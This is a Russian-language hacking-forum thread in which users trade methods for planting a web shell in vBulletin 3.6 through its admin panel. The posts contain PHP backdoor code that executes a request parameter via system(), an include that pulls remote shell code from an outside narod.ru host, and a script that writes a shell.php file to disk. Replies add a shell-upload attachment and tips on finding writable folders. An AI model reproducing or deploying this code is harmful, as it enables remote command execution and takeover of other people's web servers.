• XSS.stack #1 – первый литературный журнал от юзеров форума

Shell в vBulletin 3.6.*

SilverT

(L2) cache
Пользователь
Регистрация
26.08.2006
Сообщения
329
Реакции
8
...Не получается залить шелл в vBulletin через смайлы в админке...
...попытался через модули, тоже не получается...
...есть еще способы?..

...через модули пробовал несколько вариантов, вставлял такие скрипты в faq_complete:

Код:
if(!empty($_REQUEST['cmd'])){
  @system($_REQUEST['cmd']);
}


if(!empty($_REQUEST['profile_id'])){
	@include("http://shell_on_.narod.ru/shell.txt");
	}


$fl = fopen('shell.php','w');
fwrite($fl,"<pre>\r\n");
fwrite($fl,"<?php\r\n");
fwrite($fl,"@system(");
fwrite($fl,"$");
fwrite($fl,"_");
fwrite($fl,"REQUEST['cmd']);\r\n");
fwrite($fl,"?>\r\n");
fwrite($fl,"</pre>\r\n");
fclose($fl);

...на первые два запроса при обращении к скрипту /faq.php?cmd=dir ноль реакции...

...при выполнении третьего скрипта(тачка под вынью) в странице первой ошибкой стал вывод в браузер"Warning: fopen(showmessage.php): failed to open stream: Permission denied in \faq.php(303) : eval()'d code on line 1" со всеми вытекающими ошибками...

...в чем дело?..

З.Ы....на локалхосте все работает...
 
смотри видео __http://www.hackedpro.org/forum/showthread.php?t=271

и пробуй, там правда шелл заливал на Vbulletin 3.5.4, но думаю способ катит на всех версиях
 
Vbulletin 3.5.4, но думаю способ катит на всех версиях
...да катить то катит, только по ходу в корневую диру запись запрещена, а через передачу команды в /faq.php?cmd=command при залитом первом скрипте никакой реакции почему - то...
 
SilverT
Nix Remote Web Shell (download)

Не, ну это самый простой вариант, если не хочешь особо париться :)
Собственно, сам код аплоада выдран жестко и с мясом в аттаче.
 

Вложения

  • upload.txt
    1.7 КБ · Просмотры: 116
...учту, но сдается мне что там запись в корневую папку запрещена... =(((
Попробуй найти другую любую папку в public_html или www доступную для записи
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх